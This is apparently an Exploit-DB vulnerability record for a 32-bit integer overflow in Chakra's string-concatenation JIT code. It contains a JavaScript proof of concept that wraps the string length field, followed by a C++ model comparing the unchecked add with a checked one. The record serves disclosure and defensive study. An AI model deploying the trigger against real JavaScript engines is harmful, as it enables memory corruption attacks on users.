Vendor: Chakra
By: Anonymous
CVSS: 7.5 (HIGH)
CWE: 190 (Integer Overflow)
Product Name: Chakra
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2020

Integer Overflow in Lowerer::LowerSetConcatStrMultiItem Method

The method Lowerer::LowerSetConcatStrMultiItem is used to generate machine code to concatenate strings. At (a), there is no check for integer overflow on the 32-bit character length that the generated code accumulates. Chakra uses string chains to handle concatenated strings (the ConcatString class), so it does not require much memory to trigger the bug. The proof of concept creates a string of length 0x10000 and concatenates it onto an accumulator 0x10000 times in a loop, so the accumulated length exceeds what 32 bits can hold and wraps.

Mitigation:

The vendor should implement checks for integer overflow in the Lowerer::LowerSetConcatStrMultiItem method.
Source

Exploit-DB raw data:

/*
The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
Here's a snippet of the method.
void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
{
    ...
    IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
    ...
    InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
    ...
}

At (a), there's no check for integer overflow.

Note: Chakra uses string chains to handle concatenated strings (the ConcatString class), so it doesn't require much memory to trigger the bug.

PoC:
*/

let a = '';
let b = 'A'.repeat(0x10000);
// Each iteration appends 9 + 0x10000 characters to the concat chain; after
// 0x10000 iterations the true length exceeds 2^32, which the uint32 charLength
// field written at (a) cannot hold.
for (let i = 0; i < 0x10000; i++) {
    a = 'BBBBBBBBB' + a + b;
}

print(a.length);
print(b.length);
print(a[0]);
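As an added illustration that is not part of the Exploit-DB record or of Chakra's code: this C++ model replays the length arithmetic of the PoC loop, once with the plain uint32 add the snippet shows at (a) and once with an overflow-checked add of the kind the mitigation calls for. The prefix length 9 and the loop shape come from the PoC above; the function names are my own.

```cpp
#include <cstdint>
#include <limits>

// Overflow-checked 32-bit add: returns false and leaves *out untouched when
// a + b does not fit in uint32_t. This is the check missing at (a).
static bool checkedAddU32(uint32_t a, uint32_t b, uint32_t *out) {
    if (b > std::numeric_limits<uint32_t>::max() - a) {
        return false;
    }
    *out = a + b;
    return true;
}

// Unchecked replay of the PoC: a = 'BBBBBBBBB' + a + b, `iterations` times,
// with b of length bLen. Mirrors the wrapping uint32 add at (a) and returns
// the final (wrapped) length. For the PoC values the true length is
// 0x100090000, which wraps to 0x90000.
static uint32_t pocLengthUnchecked(uint32_t iterations, uint32_t bLen) {
    const uint32_t prefixLen = 9; // 'BBBBBBBBB'
    uint32_t len = 0;
    for (uint32_t i = 0; i < iterations; i++) {
        len = prefixLen + len; // 'BBBBBBBBB' + a
        len = len + bLen;      // (...) + b, wraps silently like (a)
    }
    return len;
}

// Checked replay: returns the 0-based iteration at which an add would first
// overflow, or -1 if every intermediate length fits in 32 bits. A lowering
// with this check would bail out (throw or fall back) instead of emitting a
// truncated charLength.
static int64_t pocFirstOverflowIteration(uint32_t iterations, uint32_t bLen) {
    const uint32_t prefixLen = 9;
    uint32_t len = 0;
    for (uint32_t i = 0; i < iterations; i++) {
        if (!checkedAddU32(prefixLen, len, &len) ||
            !checkedAddU32(len, bLen, &len)) {
            return static_cast<int64_t>(i);
        }
    }
    return -1;
}
```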